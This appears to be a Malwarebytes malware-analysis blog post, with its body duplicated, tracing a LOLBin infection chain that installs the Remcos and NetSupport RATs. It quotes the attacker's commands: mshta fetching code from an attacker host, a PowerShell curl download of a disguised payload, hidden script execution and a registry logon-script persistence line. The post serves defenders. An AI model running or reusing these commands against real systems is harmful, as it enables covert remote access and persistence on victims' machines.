Description
Recently, our team came across an infection attempt that stood out—not for its sophistication, but for how determined the attacker was to take a “living off the land” approach to the extreme.
The end goal was to deploy **Remcos** , a Remote Access Trojan (RAT), and **NetSupport Manager** , a legitimate remote administration tool that’s frequently abused as a RAT. The route the attacker took was a veritable tour of Windows’ built-in utilities—known as **LOLBins** (Living Off the Land Binaries).
Both Remcos and NetSupport are widely abused remote access tools that give attackers extensive control over infected systems and are often delivered through multi-stage phishing or infection chains.
Remcos (short for Remote Control & Surveillance) is sold as a legitimate Windows remote administration and monitoring tool but is widely used by cybercriminals. Once installed, it gives attackers full remote desktop access, file system control, command execution, keylogging, clipboard monitoring, persistence options, and tunneling or proxying features for lateral movement.
NetSupport Manager is a legitimate remote support product that becomes “NetSupport RAT” when attackers silently install and configure it for unauthorized access.
Let’s walk through how this attack unfolded, one native command at a time.
### **Stage 1: The subtle initial access**
The attack kicked off with a seemingly odd command:
`C:\Windows\System32\forfiles.exe /p c:\windows\system32 /m notepad.exe /c "cmd /c start mshta http://[attacker-ip]/web"`
At first glance, you might wonder: why not just run `mshta.exe` directly? The answer lies in defense evasion.
By roping in `forfiles.exe`, a legitimate tool for running commands over batches of files, the attacker muddied the waters. This makes the execution path a bit harder for security tools to spot. In essence, one trusted program quietly launches another, forming a chain that’s less likely to trip alarms.
### **Stage 2: Fileless download and staging**
The `mshta` command fetched a remote HTA file that immediately spawned `cmd.exe,` which rolled out an elaborate PowerShell one-liner:
`powershell.exe -NoProfile -Command`
`curl -s -L -o "<random>.pdf" (attacker-ip}/socket;`
`mkdir "<random>";`
`tar -xf "<random>.pdf" -C "<random>";`
`Invoke-CimMethod Win32_Process Create "<random>\glaxnimate.exe"`
Here's what that does:
PowerShell’s built-in curl downloaded a payload disguised as a PDF, which in reality was a TAR archive. Then, `tar.exe` (another trusted Windows add-on) unpacked it into a randomly named folder. The star of this show, however, was `glaxnimate.exe`—a trojanized version of real animation software, primed to further the infection on execution. Even here, the attacker relies entirely on Windows' own tools—no EXE droppers or macros in sight.
### **Stage 3: Staging in plain sight**
What happened next? The malicious Glaxnimate copy began writing partial files to `C:\ProgramData`:
* `SETUP.CAB.PART`
* `PROCESSOR.VBS.PART`
* `PATCHER.BAT.PART`
Why `.PART` files? It’s classic malware staging. Drop files in a half-finished state until the time is right—or perhaps until the download is complete. Once the coast is clear, rename or complete the files, then use them to push the next payloads forward.
Scripting the core elements of infection
### **Stage 4: Scripting the launch**
Malware loves a good script—especially one that no one sees. Once fully written, Windows Script Host was invoked to execute the VBScript component:
`"C:\Windows\System32\WScript.exe" "C:\ProgramData\processor.vbs"`
The VBScript used IWshShell3.Run to silently spawn `cmd.exe` with a hidden window so the victim would never see a pop-up or black box.
`IWshShell3.Run("cmd.exe /c %ProgramData%\patcher.bat", "0", "false");`
The batch file's job?
`expand setup.cab -F:* C:\ProgramData`
Use the `expand` utility to extract all the contents of the previously dropped `setup.cab` archive into ProgramData—effectively unpacking the NetSupport RAT and its helpers.
### **Stage 5: Hidden persistence**
To make sure their tool survived a restart, the attackers opted for the stealthy registry route:
`reg add "HKCU\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\PATCHDIRSEC\client32.exe" /f`
Unlike old-school Run keys, `UserInitMprLogonScript` isn’t a usual suspect and doesn't open visible windows. Every time the user logged in, the RAT came quietly along for the ride.
## Final thoughts
This infection chain is a masterclass in LOLBin abuse and proof that attackers love turning Windows’ own tools against its users. Every step of the way relies on built-in Windows tools: `forfiles`, `mshta`, `curl`, `tar`, scripting engines, `reg`, and `expand`.
So, can you use too many LOLBins to drop a RAT? As this attacker shows, the answer is “not yet.” But each additional step adds noise, and leaves more breadcrumbs for defenders to follow. The more tools a threat actor abuses, the more unique their fingerprints become.
**Stay vigilant. Monitor potential LOLBin abuse. And never trust a`.pdf` that needs `tar.exe` to open.**
Despite the heavy use of LOLBins, Malwarebytes still detects and blocks this attack. It blocked the attacker’s IP address and detected both the Remcos RAT and the NetSupport client once dropped on the system.
* * *
**We don’t just report on threats—we remove them**
Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.
The end goal was to deploy **Remcos** , a Remote Access Trojan (RAT), and **NetSupport Manager** , a legitimate remote administration tool that’s frequently abused as a RAT. The route the attacker took was a veritable tour of Windows’ built-in utilities—known as **LOLBins** (Living Off the Land Binaries).
Both Remcos and NetSupport are widely abused remote access tools that give attackers extensive control over infected systems and are often delivered through multi-stage phishing or infection chains.
Remcos (short for Remote Control & Surveillance) is sold as a legitimate Windows remote administration and monitoring tool but is widely used by cybercriminals. Once installed, it gives attackers full remote desktop access, file system control, command execution, keylogging, clipboard monitoring, persistence options, and tunneling or proxying features for lateral movement.
NetSupport Manager is a legitimate remote support product that becomes “NetSupport RAT” when attackers silently install and configure it for unauthorized access.
Let’s walk through how this attack unfolded, one native command at a time.
### **Stage 1: The subtle initial access**
The attack kicked off with a seemingly odd command:
`C:\Windows\System32\forfiles.exe /p c:\windows\system32 /m notepad.exe /c "cmd /c start mshta http://[attacker-ip]/web"`
At first glance, you might wonder: why not just run `mshta.exe` directly? The answer lies in defense evasion.
By roping in `forfiles.exe`, a legitimate tool for running commands over batches of files, the attacker muddied the waters. This makes the execution path a bit harder for security tools to spot. In essence, one trusted program quietly launches another, forming a chain that’s less likely to trip alarms.
### **Stage 2: Fileless download and staging**
The `mshta` command fetched a remote HTA file that immediately spawned `cmd.exe,` which rolled out an elaborate PowerShell one-liner:
`powershell.exe -NoProfile -Command`
`curl -s -L -o "<random>.pdf" (attacker-ip}/socket;`
`mkdir "<random>";`
`tar -xf "<random>.pdf" -C "<random>";`
`Invoke-CimMethod Win32_Process Create "<random>\glaxnimate.exe"`
Here's what that does:
PowerShell’s built-in curl downloaded a payload disguised as a PDF, which in reality was a TAR archive. Then, `tar.exe` (another trusted Windows add-on) unpacked it into a randomly named folder. The star of this show, however, was `glaxnimate.exe`—a trojanized version of real animation software, primed to further the infection on execution. Even here, the attacker relies entirely on Windows' own tools—no EXE droppers or macros in sight.
### **Stage 3: Staging in plain sight**
What happened next? The malicious Glaxnimate copy began writing partial files to `C:\ProgramData`:
* `SETUP.CAB.PART`
* `PROCESSOR.VBS.PART`
* `PATCHER.BAT.PART`
Why `.PART` files? It’s classic malware staging. Drop files in a half-finished state until the time is right—or perhaps until the download is complete. Once the coast is clear, rename or complete the files, then use them to push the next payloads forward.
Scripting the core elements of infection
### **Stage 4: Scripting the launch**
Malware loves a good script—especially one that no one sees. Once fully written, Windows Script Host was invoked to execute the VBScript component:
`"C:\Windows\System32\WScript.exe" "C:\ProgramData\processor.vbs"`
The VBScript used IWshShell3.Run to silently spawn `cmd.exe` with a hidden window so the victim would never see a pop-up or black box.
`IWshShell3.Run("cmd.exe /c %ProgramData%\patcher.bat", "0", "false");`
The batch file's job?
`expand setup.cab -F:* C:\ProgramData`
Use the `expand` utility to extract all the contents of the previously dropped `setup.cab` archive into ProgramData—effectively unpacking the NetSupport RAT and its helpers.
### **Stage 5: Hidden persistence**
To make sure their tool survived a restart, the attackers opted for the stealthy registry route:
`reg add "HKCU\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\PATCHDIRSEC\client32.exe" /f`
Unlike old-school Run keys, `UserInitMprLogonScript` isn’t a usual suspect and doesn't open visible windows. Every time the user logged in, the RAT came quietly along for the ride.
## Final thoughts
This infection chain is a masterclass in LOLBin abuse and proof that attackers love turning Windows’ own tools against its users. Every step of the way relies on built-in Windows tools: `forfiles`, `mshta`, `curl`, `tar`, scripting engines, `reg`, and `expand`.
So, can you use too many LOLBins to drop a RAT? As this attacker shows, the answer is “not yet.” But each additional step adds noise, and leaves more breadcrumbs for defenders to follow. The more tools a threat actor abuses, the more unique their fingerprints become.
**Stay vigilant. Monitor potential LOLBin abuse. And never trust a`.pdf` that needs `tar.exe` to open.**
Despite the heavy use of LOLBins, Malwarebytes still detects and blocks this attack. It blocked the attacker’s IP address and detected both the Remcos RAT and the NetSupport client once dropped on the system.
* * *
**We don’t just report on threats—we remove them**
Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.
Basic Information
ID
MALWAREBYTES:7DB75EE503E7656F7F1BD410B5BBAEBA
Published
Jan 21, 2026 at 17:04